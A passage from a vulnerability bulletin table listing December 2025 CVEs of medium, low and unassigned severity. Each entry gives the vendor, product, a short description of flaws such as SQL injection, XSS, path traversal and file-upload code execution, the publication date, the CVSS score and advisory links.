| JeecgBoot--JeecgBoot | A weakness has been identified in JeecgBoot up to 3.9.0. The impacted element is the function SysUserOnlineController of the file jeecg-boot/jeecg-module-system/jeecg-system-biz/src/main/java/org/jeecg/modules/system/controller/SysUserOnlineController.java. Executing manipulation can lead to manage user sessions. The attack can be launched remotely. The exploit has been made available to the public and could be exploited. This patch is called b686f9fbd1917edffe5922c6362c817a9361cfbd. Applying a patch is advised to resolve this issue. | 2025-12-19 | 4.3 | CVE-2025-14909 | VDB-337433 | JeecgBoot SysUserOnlineController.java SysUserOnlineController user session VDB-337433 | CTI Indicators (IOB, IOC, IOA) Submit #715743 | jeecgboot 3.9.0 bfla https://github.com/jeecgboot/JeecgBoot/issues/9195 https://github.com/jeecgboot/JeecgBoot/issues/9195#issue-3719368751 https://github.com/jeecgboot/JeecgBoot/commit/b686f9fbd1917edffe5922c6362c817a9361cfbd |
| Edimax--BR-6208AC | A vulnerability was detected in Edimax BR-6208AC 1.02. This impacts the function handle_retr of the component FTP Daemon Service. The manipulation results in path traversal. The attack may be launched remotely. The exploit is now public and may be used. Edimax confirms this issue: "This product is no longer available in the market and has been discontinued for five years. Consequently, Edimax no longer provides technical support, firmware updates, or security patches for this specific model. However, to ensure the safety of our remaining active users, we acknowledge this report and will take the following mitigation actions: (A) We will issue an official security advisory on our support website. (B) We will strongly advise users to disable the FTP service on this device to mitigate the reported risk, by which the product will still work for common use. (C) We will recommend users upgrade to newer, supported models." This vulnerability only affects products that are no longer supported by the maintainer. | 2025-12-19 | 4.3 | CVE-2025-14910 | VDB-337435 | Edimax BR-6208AC FTP Daemon Service handle_retr path traversal VDB-337435 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #713704 | Edimax BR-6208AC V2_1.02 Absolute Path Traversal https://tzh00203.notion.site/EDIMAX-BR-6208AC-V2_1-02-Path-Traversal-Vulnerability-in-FTPd-2c4b5c52018a80fb8812f7d510abf558?source=copy_link |
| code-projects--Online Appointment Booking System | A vulnerability was found in code-projects Online Appointment Booking System 1.0. Impacted is an unknown function of the file /admin/deletemanager.php. The manipulation of the argument managername results in sql injection. The attack may be performed from remote. The exploit has been made public and could be used. | 2025-12-19 | 4.7 | CVE-2025-14939 | VDB-337519 | code-projects Online Appointment Booking System deletemanager.php sql injection VDB-337519 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #715796 | code-projects Online Appointment Booking System V1.0 SQL injection https://github.com/wegitlab/cve/issues/1 https://code-projects.org/ |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in libnbd. A malicious actor could exploit this by convincing libnbd to open a specially crafted Uniform Resource Identifier (URI). This vulnerability arises because non-standard hostnames starting with '-o' are incorrectly interpreted as arguments to the Secure Shell (SSH) process, rather than as hostnames. This could lead to arbitrary code execution with the privileges of the user running libnbd. | 2025-12-19 | 4.8 | CVE-2025-14946 | https://access.redhat.com/security/cve/CVE-2025-14946 RHBZ#2423789 https://libguestfs.org/libnbd-release-notes-1.24.1.html#Security |
| code-projects--Simple Stock System | A flaw has been found in code-projects Simple Stock System 1.0. The impacted element is an unknown function of the file /market/chatuser.php. This manipulation causes cross site scripting. The attack is possible to be carried out remotely. The exploit has been published and may be used. | 2025-12-19 | 4.3 | CVE-2025-14962 | VDB-337598 | code-projects Simple Stock System chatuser.php cross site scripting VDB-337598 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #717640 | Code-projects Simple Stock System v1.0 Reflective XSS vulnerability https://github.com/wyxclcw/CVE/issues/1 https://code-projects.org/ |
| FastAdmin--FastAdmin | A vulnerability was determined in FastAdmin up to 1.7.0.20250506. Affected is the function selectpage of the file application/common/controller/Backend.php of the component Backend Controller. Executing manipulation of the argument custom/searchField can lead to sql injection. It is possible to launch the attack remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-19 | 4.7 | CVE-2025-14966 | VDB-337601 | FastAdmin Backend Controller Backend.php selectpage sql injection VDB-337601 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #718309 | FastAdmin 1.7.0.20250506 SQL Injection Submit #718339 | FastAdmin 1.7.0.20250506 SQL Injection (Duplicate) https://note-hxlab.wetolink.com/share/1924AEdgGFYu https://note-hxlab.wetolink.com/share/auEz57nwynMq |
| SeaCMS--SeaCMS | A vulnerability was found in SeaCMS up to 13.3. The impacted element is an unknown function of the file admin_video.php. Performing manipulation of the argument e_id results in sql injection. The attack is possible to be carried out remotely. The exploit has been made public and could be used. | 2025-12-21 | 4.7 | CVE-2025-15003 | VDB-337708 | SeaCMS admin_video.php sql injection VDB-337708 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #716084 | SeaCMS 13.3 SQL Injection https://note-hxlab.wetolink.com/share/aTI1wPFLm7FG |
| Nozomi Networks--Guardian | A Stored HTML Injection vulnerability was discovered in the Time Machine Snapshot Diff functionality due to improper validation of network traffic data. An unauthenticated attacker can send specially crafted network packets at two different times to inject HTML tags into asset attributes across two snapshots. Exploitation requires a victim to use the Time Machine Snapshot Diff feature on those specific snapshots and perform specific GUI actions, at which point the injected HTML renders in their browser, enabling phishing and open redirect attacks. Full XSS exploitation is prevented by input validation and Content Security Policy. Attack complexity is high due to multiple required conditions. | 2025-12-18 | 4.7 | CVE-2025-40891 | https://security.nozominetworks.com/NN-2025:12-01 |
| HCL Software--BigFix Remote Control | Improper management of Content Security Policy in HCL BigFix Remote Control Lite Web Portal (versions 10.1.0.0326 and lower) may allow the execution of malicious code in web pages. | 2025-12-17 | 4.7 | CVE-2025-59849 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0127332 |
| BullWall--Ransomware Containment | BullWall Ransomware Containment relies on the number of file modifications to trigger detection. An authenticated attacker could encrypt a single large file without triggering a detection alert. Versions 4.6.0.0, 4.6.0.6, 4.6.0.7, and 4.6.1.4 were confirmed to be affected; other versions before and after may also be affected. | 2025-12-18 | 4.3 | CVE-2025-62002 | url url |
| Mattermost--Mattermost | Mattermost versions 11.0.x <= 11.0.4, 10.12.x <= 10.12.2, 10.11.x <= 10.11.6 and Mattermost Calls versions <=1.10.0 fail to implement CSRF protection on the Calls widget page which allows an authenticated attacker to initiate calls and inject messages into channels or direct messages via a malicious webpage or crafted link | 2025-12-17 | 4.3 | CVE-2025-62190 | https://mattermost.com/security-updates |
| HappyDevs--TempTool | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in HappyDevs TempTool allows Retrieve Embedded Sensitive Data.This issue affects TempTool: from n/a through 1.3.1. | 2025-12-21 | 4.3 | CVE-2025-62955 | https://vdp.patchstack.com/database/wordpress/plugin/current-template-name/vulnerability/wordpress-temptool-show-current-template-info-plugin-1-3-1-sensitive-data-exposure-vulnerability?_s_id=cve |
| RadiusTheme--Radius Blocks | Authorization Bypass Through User-Controlled Key vulnerability in RadiusTheme Radius Blocks allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Radius Blocks: from n/a through 2.2.1. | 2025-12-18 | 4.3 | CVE-2025-64282 | https://vdp.patchstack.com/database/wordpress/plugin/radius-blocks/vulnerability/wordpress-radius-blocks-plugin-2-2-1-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Palantir--com.palantir.controlpanel:control-panel | Control Panel provides an API for pre-registering into an enrollment and organization prior to a user's first login. The API for creating users checks that the account requesting a user creation has `edit` on the enrollment-level user directory, but is missing a separate check that the enrollment editor has access (or belongs to) the organization that they are adding a user to. | 2025-12-18 | 4.1 | CVE-2025-64400 | https://palantir.safebase.us/?tcuUid=52a9fd2f-1868-48cb-af01-93c589160e19 |
| Advantech--WebAccess/SCADA | Advantech WebAccess/SCADA is vulnerable to directory traversal, which may allow an attacker to determine the existence of arbitrary files. | 2025-12-18 | 4.3 | CVE-2025-67653 | https://www.advantech.com/en-us/support/details/installation?id=1-MS9MJV https://www.cisa.gov/news-events/ics-advisories/icsa-25-352-06 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-352-06.json |
| Esri--ArcGIS Web AppBuilder {Developer Edition) | There is an HTML injection issue in Esri ArcGIS Web AppBuilder developer edition versions prior to 2.30 that allows a remote, unauthenticated attacker to potentially entice a user to click a link that causes arbitrary HTML to render in a victim's browser. There is no evidence of JavaScript execution, which limits the impact. At the time of submission, ArcGIS Web App Builder developer edition is retired. ArcGIS Web App Builder 2.30 is not susceptible to this vulnerability. | 2025-12-19 | 4.7 | CVE-2025-67712 | https://support.esri.com/en-us/knowledge-base/deprecation-arcgis-web-appbuilder-000036340 |
| WeblateOrg--weblate | Weblate is a web based localization tool. In versions prior to 5.15, it was possible to retrieve user notification settings or list all users via API. Version 5.15 fixes the issue. | 2025-12-16 | 4.3 | CVE-2025-67715 | https://github.com/WeblateOrg/weblate/security/advisories/GHSA-3pmh-24wp-xpf4 https://github.com/WeblateOrg/weblate/pull/17256 |
| Mintlify--Mintlify Platform | The Deployment Infrastructure in Mintlify Platform before 2025-11-15 allows remote attackers to bypass security patches and execute downgrade attacks via predictable deployment identifiers on the Vercel preview domain. An attacker can identify the URL structure of a previous deployment that contains unpatched vulnerabilities. By browsing directly to the specific git-ref or deployment-id subdomain, the attacker can force the application to load the vulnerable version. | 2025-12-19 | 4.9 | CVE-2025-67846 | https://www.mintlify.com/docs/changelog https://www.mintlify.com/blog/working-with-security-researchers-november-2025 https://kibty.town/blog/mintlify/ https://news.ycombinator.com/item?id=46317098 |
| capstone-engine--capstone | Capstone is a disassembly framework. In versions 6.0.0-Alpha5 and prior, Skipdata length is not bounds-checked, so a user-provided skipdata callback can make cs_disasm/cs_disasm_iter memcpy more than 24 bytes into cs_insn.bytes, causing a heap buffer overflow in the disassembly path. Commit cbef767ab33b82166d263895f24084b75b316df3 fixes the issue. | 2025-12-17 | 4.8 | CVE-2025-67873 | https://github.com/capstone-engine/capstone/security/advisories/GHSA-hj6g-v545-v7jg https://github.com/capstone-engine/capstone/commit/cbef767ab33b82166d263895f24084b75b316df3 |
| capstone-engine--capstone | Capstone is a disassembly framework. In versions 6.0.0-Alpha5 and prior, an unchecked vsnprintf return in SStream_concat lets a malicious cs_opt_mem.vsnprintf drive SStream's index negative or past the end, leading to a stack buffer underflow/overflow when the next write occurs. Commit 2c7797182a1618be12017d7d41e0b6581d5d529e fixes the issue. | 2025-12-17 | 4.8 | CVE-2025-68114 | https://github.com/capstone-engine/capstone/security/advisories/GHSA-85f5-6xr3-q76r https://github.com/capstone-engine/capstone/commit/2c7797182a1618be12017d7d41e0b6581d5d529e |
| Elastic--Kibana | Improper Authorization (CWE-285) in Kibana can lead to privilege escalation (CAPEC-233) by allowing an authenticated user to change a document's sharing type to "global," even though they do not have permission to do so, making it visible to everyone in the space via a crafted a HTTP request. | 2025-12-18 | 4.3 | CVE-2025-68386 | https://discuss.elastic.co/t/kibana-8-19-8-9-1-8-and-9-2-2-security-update-esa-2025-38/384186 |
| Elastic--Elasticsearch | Allocation of Resources Without Limits or Throttling (CWE-770) in Elasticsearch can allow an authenticated user with snapshot restore privileges to cause Excessive Allocation (CAPEC-130) of memory and a denial of service (DoS) via crafted HTTP request. | 2025-12-18 | 4.9 | CVE-2025-68390 | https://discuss.elastic.co/t/elasticsearch-8-19-8-9-1-8-and-9-2-2-security-update-esa-2025-37/384185 |
| Elastic--Kibana | Improper Authorization (CWE-285) in Kibana can lead to privilege escalation (CAPEC-233) by allowing an authenticated user to bypass intended permission restrictions via a crafted HTTP request. This allows an attacker who lacks the live queries - read permission to successfully retrieve the list of live queries. | 2025-12-18 | 4.3 | CVE-2025-68422 | https://discuss.elastic.co/t/kibana-8-19-7-9-1-7-and-9-2-1-security-update-esa-2025-39/384187 |
| Biopython--Biopython | Bio.Entrez in Biopython through 186 allows doctype XXE. | 2025-12-18 | 4.9 | CVE-2025-68463 | https://github.com/biopython/biopython/issues/5109 |
| Utarit Informatics Services Inc.--SoliClub | Missing Authorization vulnerability in Utarit Informatics Services Inc. SoliClub allows Privilege Abuse.This issue affects SoliClub: before 5.3.7. | 2025-12-18 | 4.3 | CVE-2025-7047 | https://www.usom.gov.tr/bildirim/tr-25-0466 |
| JobCareer--WP JobHunt | The WP JobHunt plugin for WordPress, used by the JobCareer theme, is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 7.7 via the 'cs_update_application_status_callback' due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Candidate-level access and above, to send a site-generated email with injected HTML to any user. | 2025-12-20 | 4.3 | CVE-2025-7733 | https://www.wordfence.com/threat-intel/vulnerabilities/id/409bcd8c-6cd3-4022-a67f-57e901c83d66?source=cve https://themeforest.net/item/jobcareer-job-board-responsive-wordpress-theme/14221636 |
Low Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| Mattermost--Mattermost | Mattermost Desktop App versions <6.0.0 fail to sanitize sensitive information from Mattermost logs and clear data on server deletion which allows an attacker with access to the users system to gain access to potentially sensitive information via reading the application logs. | 2025-12-17 | 3.3 | CVE-2025-13321 | https://mattermost.com/security-updates |
| Mattermost--Mattermost | Mattermost Desktop App versions <6.0.0 fail to enable the Hardened Runtime on the Mattermost Desktop App when packaged for Mac App Store which allows an attacker to inherit TCC permissions via copying the binary to a tmp folder. | 2025-12-17 | 3.9 | CVE-2025-13326 | https://mattermost.com/security-updates |
| Mattermost--Mattermost | Mattermost versions 10.11.x <= 10.11.6 and Mattermost GitHub plugin versions <=2.4.0 fail to validate plugin bot identity in reaction forwarding which allows attackers to hijack the GitHub reaction feature to make users add reactions to arbitrary GitHub objects via crafted notification posts. | 2025-12-17 | 3 | CVE-2025-13352 | https://mattermost.com/security-updates |
| LINE Corporation--LINE client for Android | LINE client for Android versions from 13.8 to 15.5 is vulnerable to UI spoofing in the in-app browser where a specific layout could obscure the full-screen warning prompt, potentially allowing attackers to conduct phishing attacks. | 2025-12-15 | 3.4 | CVE-2025-14019 | https://hackerone.com/reports/3062270 |
| LINE Corporation--LINE client for iOS | LINE client for iOS prior to 15.19 allows UI spoofing due to inconsistencies between the navigation state and the in-app browser's user interface, which could create confusion about the trust context of displayed pages or interactive elements under specific conditions. | 2025-12-15 | 3.1 | CVE-2025-14023 | https://hackerone.com/reports/3260386 |
| Shenzhen Sixun Software--Sixun Shanghui Group Business Management System | A security flaw has been discovered in Shenzhen Sixun Software Sixun Shanghui Group Business Management System 4.10.24.3. Affected by this issue is some unknown functionality of the file /ExportFiles/. The manipulation results in files or directories accessible. The attack may be launched remotely. This attack is characterized by high complexity. The exploitation is known to be difficult. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-15 | 3.7 | CVE-2025-14697 | VDB-336415 | Shenzhen Sixun Software Sixun Shanghui Group Business Management System ExportFiles file access VDB-336415 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #705619 | Shenzhen Sixun Software Co., Ltd. Sissyun Shanghui 7 Online Business System 4.10.24.3 Unauthorized https://github.com/zhangbuneng/Sissyun-Shanghui-7-Unauthorized-password-modificationfication-vulnerability./issues/2 https://github.com/zhangbuneng/Sissyun-Shanghui-7-Unauthorized-password-modificationfication-vulnerability./issues/2#issue-3689006583 |
| OFFIS--DCMTK | A flaw has been found in OFFIS DCMTK up to 3.6.9. The impacted element is the function DcmQueryRetrieveIndexDatabaseHandle::startFindRequest/DcmQueryRetrieveIndexDatabaseHandle::startMoveRequest in the library dcmqrdb/libsrc/dcmqrdbi.cc of the component dcmqrscp. This manipulation causes null pointer dereference. The attack requires local access. Upgrading to version 3.7.0 is sufficient to resolve this issue. Patch name: ffb1a4a37d2c876e3feeb31df4930f2aed7fa030. You should upgrade the affected component. | 2025-12-18 | 3.3 | CVE-2025-14841 | VDB-337004 | OFFIS DCMTK dcmqrscp dcmqrdbi.cc startMoveRequest null pointer dereference VDB-337004 | CTI Indicators (IOB, IOC, IOA) Submit #714605 | OFFIS DCMTK 3.6.9 Denial of Service Submit #714634 | OFFIS DCMTK 3.6.9 Denial of Service (Duplicate) https://support.dcmtk.org/redmine/issues/1183 https://github.com/DCMTK/dcmtk/commit/ffb1a4a37d2c876e3feeb31df4930f2aed7fa030 https://github.com/DCMTK/dcmtk/releases/tag/DCMTK-3.7.0 |
| Open5GS--Open5GS | A flaw has been found in Open5GS up to 2.7.5. This impacts the function ogs_pfcp_handle_create_pdr in the library lib/pfcp/handler.c of the component FAR-ID Handler. Executing manipulation can lead to null pointer dereference. The attack may be performed from remote. The attack requires a high level of complexity. The exploitability is said to be difficult. The exploit has been published and may be used. This patch is called 93a9fd98a8baa94289be3b982028201de4534e32. It is advisable to implement a patch to correct this issue. | 2025-12-19 | 3.1 | CVE-2025-14953 | VDB-337589 | Open5GS FAR-ID handler.c ogs_pfcp_handle_create_pdr null pointer dereference VDB-337589 | CTI Indicators (IOB, IOC, IOA) Submit #716799 | Open5GS v2.7.5 Reachable Assertion https://github.com/open5gs/open5gs/issues/4179 https://github.com/open5gs/open5gs/issues/4179#issuecomment-3614868758 https://github.com/open5gs/open5gs/issues/4179#issue-3666399406 https://github.com/open5gs/open5gs/commit/93a9fd98a8baa94289be3b982028201de4534e32 |
| Open5GS--Open5GS | A vulnerability has been found in Open5GS up to 2.7.5. Affected is the function ogs_pfcp_pdr_find_or_add/ogs_pfcp_far_find_or_add/ogs_pfcp_urr_find_or_add/ogs_pfcp_qer_find_or_add in the library lib/pfcp/context.c of the component QER/FAR/URR/PDR. The manipulation leads to reachable assertion. It is possible to initiate the attack remotely. The attack's complexity is rated as high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier of the patch is 442369dcd964f03d95429a6a01a57ed21f7779b7. Applying a patch is the recommended action to fix this issue. | 2025-12-19 | 3.7 | CVE-2025-14954 | VDB-337590 | Open5GS QER/FAR/URR/PDR context.c ogs_pfcp_qer_find_or_add assertion VDB-337590 | CTI Indicators (IOB, IOC, IOA) Submit #716810 | Open5GS v2.7.5 CWE-617 Reachable Assertion https://github.com/open5gs/open5gs/issues/4181 https://github.com/open5gs/open5gs/issues/4181#issuecomment-3615646842 https://github.com/open5gs/open5gs/issues/4181#issue-3667069101 https://github.com/open5gs/open5gs/commit/442369dcd964f03d95429a6a01a57ed21f7779b7 |
| Open5GS--Open5GS | A vulnerability was found in Open5GS up to 2.7.5. Affected by this vulnerability is the function ogs_pfcp_handle_create_pdr in the library lib/pfcp/handler.c of the component PFCP. The manipulation results in improper initialization. It is possible to launch the attack remotely. This attack is characterized by high complexity. The exploitation appears to be difficult. The exploit has been made public and could be used. The patch is identified as 773117aa5472af26fc9f80e608d3386504c3bdb7. It is best practice to apply a patch to resolve this issue. | 2025-12-19 | 3.7 | CVE-2025-14955 | VDB-337591 | Open5GS PFCP handler.c ogs_pfcp_handle_create_pdr initialization VDB-337591 | CTI Indicators (IOB, IOC, IOA) Submit #716841 | Open5GS v2.7.5 Reachable Assertion https://github.com/open5gs/open5gs/issues/4182 https://github.com/open5gs/open5gs/issues/4182#issuecomment-3616081878 https://github.com/open5gs/open5gs/issues/4182#issue-3670797098 https://github.com/open5gs/open5gs/commit/773117aa5472af26fc9f80e608d3386504c3bdb7 |
| WebAssembly--Binaryen | A vulnerability was identified in WebAssembly Binaryen up to 125. This affects the function IRBuilder::makeLocalGet/IRBuilder::makeLocalSet/IRBuilder::makeLocalTee of the file src/wasm/wasm-ir-builder.cpp of the component IRBuilder. Such manipulation of the argument Index leads to null pointer dereference. Local access is required to approach this attack. The exploit is publicly available and might be used. The name of the patch is 6fb2b917a79578ab44cf3b900a6da4c27251e0d4. Applying a patch is advised to resolve this issue. | 2025-12-19 | 3.3 | CVE-2025-14957 | VDB-337593 | WebAssembly Binaryen IRBuilder wasm-ir-builder.cpp makeLocalTee null pointer dereference VDB-337593 | CTI Indicators (IOB, IOC, IOA) Submit #717317 | WebAssembly binaryen e7706b3 Memory Corruption Submit #717319 | WebAssembly binaryen e7706b3 Memory Corruption (Duplicate) https://github.com/WebAssembly/binaryen/issues/8090 https://github.com/WebAssembly/binaryen/pull/8099 https://github.com/oneafter/1204/blob/main/af1 https://github.com/WebAssembly/binaryen/commit/6fb2b917a79578ab44cf3b900a6da4c27251e0d4 |
| HCL Software--BigFix Remote Control | Improper management of Path-relative stylesheet import in HCL BigFix Remote Control Lite Web Portal (versions 10.1.0.0326 and lower) may allow to execute malicious code in certain web pages. | 2025-12-17 | 3.7 | CVE-2025-55254 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0127332 |
| Mattermost--Mattermost | Mattermost versions 10.11.x <= 10.11.4 fail to validate redirect URLs on the /error page, which allows an attacker to redirect a victim to a malicious site via a crafted link opened in a new tab. | 2025-12-17 | 3.1 | CVE-2025-62690 | https://mattermost.com/security-updates |
| Microsoft--Microsoft Edge for Android | Microsoft Edge (Chromium-based) Spoofing Vulnerability | 2025-12-18 | 3.1 | CVE-2025-65046 | Microsoft Edge (Chromium-based) Spoofing Vulnerability |
| JetBrains--TeamCity | In JetBrains TeamCity before 2025.11 stored XSS was possible on agentpushInstall page | 2025-12-16 | 3.5 | CVE-2025-68163 | https://www.jetbrains.com/privacy-security/issues-fixed/ |
| Debian--FreedomBox | Freedombox before 25.17.1 does not set proper permissions for the backups-data directory, allowing the reading of dump files of databases. | 2025-12-18 | 3.2 | CVE-2025-68462 | https://salsa.debian.org/freedombox-team/freedombox/-/commit/8ba444990b4af6eec4b6b2b26482b107d |
| wpvividplugins--Migration, Backup, Staging WPvivid Backup & Migration | The Migration, Backup, Staging - WPvivid Backup & Migration plugin for WordPress is vulnerable to arbitrary directory creation in all versions up to, and including, 0.9.120. This is due to the check_filesystem_permissions() function not properly restricting the directories that can be created, or in what location. This makes it possible for authenticated attackers, with Administrator-level access and above, to create arbitrary directories. | 2025-12-21 | 2.7 | CVE-2025-12654 | https://www.wordfence.com/threat-intel/vulnerabilities/id/662aa8dd-69b7-49e3-811c-04329544e106?source=cve https://plugins.trac.wordpress.org/browser/wpvivid-backuprestore/tags/0.9.120/includes/staging/class-wpvivid-staging.php#L1535 https://plugins.trac.wordpress.org/browser/wpvivid-backuprestore/tags/0.9.120/includes/staging/class-wpvivid-staging.php#L1571 https://plugins.trac.wordpress.org/browser/wpvivid-backuprestore/tags/0.9.120/includes/staging/class-wpvivid-staging.php#L1568 https://wordpress.org/plugins/wpvivid-backuprestore/ https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3397673%40wpvivid-backuprestore&new=3397673%40wpvivid-backuprestore&sfp_email=&sfph_mail= |
| vion707--DMadmin | A vulnerability was determined in vion707 DMadmin up to 3403cafdb42537a648c30bf8cbc8148ec60437d1. This impacts the function Add of the file Admin/Controller/AddonsController.class.php of the component Backend. Executing manipulation can lead to cross site scripting. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-15 | 2.4 | CVE-2025-14722 | VDB-336467 | vion707 DMadmin Backend AddonsController.class.php add cross site scripting VDB-336467 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #707130 | 大漠急速开发 DMadmin Based on ThinkPhp 3.23 development version xss https://github.com/DeepMountains/zzz/blob/main/CVE-2025-2-2.md |
| xiweicheng--TMS | A security vulnerability has been detected in xiweicheng TMS up to 2.28.0. This affects the function createComment of the file /admin/blog/comment/create. Such manipulation of the argument content leads to cross site scripting. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-17 | 2.4 | CVE-2025-14801 | VDB-336939 | xiweicheng TMS create createComment cross site scripting VDB-336939 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #708322 | xiweicheng TMS v2.28.0 Cross Site Scripting https://github.com/ha1yu-Yiqiyin/warehouse/blob/main/TMS_v2.28.0_XSS-1.md |
| ZZCMS--ZZCMS | A flaw has been found in ZZCMS 2025. Affected by this vulnerability is an unknown functionality of the file /reg/user_save.php of the component User Data Storage Module. This manipulation causes cleartext storage in a file or on disk. Remote exploitation of the attack is possible. The exploit has been published and may be used. | 2025-12-17 | 2.7 | CVE-2025-14836 | VDB-336986 | ZZCMS User Data Storage user_save.php cleartext storage in a file or on disk VDB-336986 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #711654 | zzcms zzcms2025 Plaintext Password in Configuration File https://note-hxlab.wetolink.com/share/bu2KYevoyBm6 |
| Campcodes--Complete Online Beauty Parlor Management System | A weakness has been identified in Campcodes Complete Online Beauty Parlor Management System 1.0. The affected element is an unknown function of the file /admin/bwdates-reports-details.php. Executing manipulation of the argument fromdate can lead to cross site scripting. The attack may be launched remotely. The exploit has been made available to the public and could be exploited. | 2025-12-21 | 2.4 | CVE-2025-14991 | VDB-337685 | Campcodes Complete Online Beauty Parlor Management System bwdates-reports-details.php cross site scripting VDB-337685 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #718458 | campcodes Complete Online Beauty Parlor Management System V1.0 cross site scripting https://github.com/funnnxxx/my-cve/issues/1 https://www.campcodes.com/ |
| Sunbird--Sunbird | An error-based SQL injection vulnerability exists in the Sunbird Power IQ 9.2.0 API. The vulnerability is due to an outdated API endpoint that applied arrays without proper input validation. This can allow attackers to manipulate SQL queries. This has been addressed in Power IQ version 9.2.1, where the API call code was updated to ensure safe handling of input values. | 2025-12-15 | 2.5 | CVE-2025-55703 | https://www.sunbirddcim.com/ https://pastebin.com/C6hVPpF4 |
| JetBrains--TeamCity | In JetBrains TeamCity before 2025.11 maven embedder allowed loading extensions via project configuration | 2025-12-16 | 2.7 | CVE-2025-68162 | https://www.jetbrains.com/privacy-security/issues-fixed/ |
| JetBrains--TeamCity | In JetBrains TeamCity before 2025.11 port enumeration was possible via the Perforce connection test | 2025-12-16 | 2.7 | CVE-2025-68164 | https://www.jetbrains.com/privacy-security/issues-fixed/ |
Severity Not Yet Assigned
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| Netaxis--Netaxis | Netaxis API Orchestrator (APIO) before 0.19.3 allows server side template injection (SSTI). | 2025-12-17 | not yet calculated | CVE-2022-23851 | https://www.netaxis.be/products/apio/ https://blog.tig00r.me/post/CVE-2022-23851 |
| Inventory Management Systems--Inventory Management systems | A reflected cross-site scripting (XSS) vulnerability in the component /index.php/cuzh4 of PHP Inventory Management System 1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. | 2025-12-15 | not yet calculated | CVE-2023-36337 | https://github.com/ThuanNguyen115685/Report/blob/main/XSS.md https://gist.github.com/nguyenkhanhthuan/f345c8ea0551c10ead197680f2ba9c66 |
| Inventory Management Systems--Inventory Management systems | Inventory Management System 1 was discovered to contain a SQL injection vulnerability. | 2025-12-15 | not yet calculated | CVE-2023-36338 | https://github.com/ThuanNguyen115685/Report/blob/main/SQLI.md https://gist.github.com/nguyenkhanhthuan/5294a28bb111f11da4b1f4f1bddf88c8 |
| anirbandutta--NEW-BUZZ | SQL injection vulnerability in anirbandutta9 NEWS-BUZZ v.1.0 allows a remote attacker to execute arbitrary code via a crafted script. | 2025-12-15 | not yet calculated | CVE-2023-38913 | https://github.com/ThuanNguyen115685/Report/blob/main/sqlinjection.md https://gist.github.com/nguyenkhanhthuan/03ce706686508b14506d38788c754dfb |
| Coppermine--coppermine-gallery | Coppermine Gallery 1.6.25 contains a remote code execution vulnerability that allows authenticated attackers to upload malicious PHP files through the plugin manager. Attackers can upload a zipped PHP file with system commands to the plugin directory and execute arbitrary code by accessing the uploaded plugin script. | 2025-12-15 | not yet calculated | CVE-2023-53868 | ExploitDB-51738 Coppermine Gallery Archived Product Webpage https://www.vulncheck.com/advisories/coppermine-gallery-remote-code-execution-via-plugin-upload |
| WebIGniter--WebIGniter | WEBIGniter 28.7.23 contains a file upload vulnerability that allows authenticated attackers to upload and execute dangerous PHP files through the media function. Attackers can leverage any created account to upload malicious PHP scripts that enable remote code execution on the application server. | 2025-12-15 | not yet calculated | CVE-2023-53869 | ExploitDB-51736 Webigniter Product Webpage VulnCheck Advisory: WEBIGniter 28.7.23 Unrestricted File Upload Remote Code Execution |
| Jorani--Jorani | Jorani 1.0.3 contains a reflected cross-site scripting vulnerability in the language parameter that allows attackers to inject malicious scripts. Attackers can craft XSS payloads in the language parameter to execute arbitrary JavaScript and potentially steal user session information. | 2025-12-15 | not yet calculated | CVE-2023-53870 | ExploitDB-51715 Jorani Product Webpage VulnCheck Advisory: Jorani 1.0.3 Cross-Site Scripting Vulnerability via Language Parameter |
| Soosyze--Soosyze | Soosyze 2.0.0 contains a file upload vulnerability that allows attackers to upload arbitrary HTML files with embedded PHP code to the application. Attackers can exploit the broken file upload mechanism to potentially view sensitive file paths and execute malicious PHP scripts on the server. | 2025-12-15 | not yet calculated | CVE-2023-53871 | ExploitDB-51718 soosyze Product Homepage soosyze GitHub Repository VulnCheck Advisory: Soosyze 2.0.0 Unrestricted File Upload via Broken Upload Logic |
| wp2fac--Wp2Fac | Wp2Fac 1.0 contains an OS command injection vulnerability in the send.php endpoint that allows remote attackers to execute arbitrary system commands. Attackers can inject shell commands through the 'numara' parameter by appending shell commands with '&' operators to execute malicious code. | 2025-12-15 | not yet calculated | CVE-2023-53872 | ExploitDB-51717 wp2fac GitHub Repository VulnCheck Advisory: Wp2Fac 1.0 OS Command Injection via send.php Endpoint |
| Syncbreeze--SyncBreeze | SyncBreeze 15.2.24 contains a denial of service vulnerability in the login authentication mechanism that allows attackers to crash the service. Attackers can send an oversized password parameter with repeated 'password=' values to overwhelm the login endpoint and potentially disrupt service availability. | 2025-12-15 | not yet calculated | CVE-2023-53873 | ExploitDB-51725 SyncBreeze Product Webpage VulnCheck Advisory: SyncBreeze 15.2.24 Denial of Service via Login Endpoint Overflow |
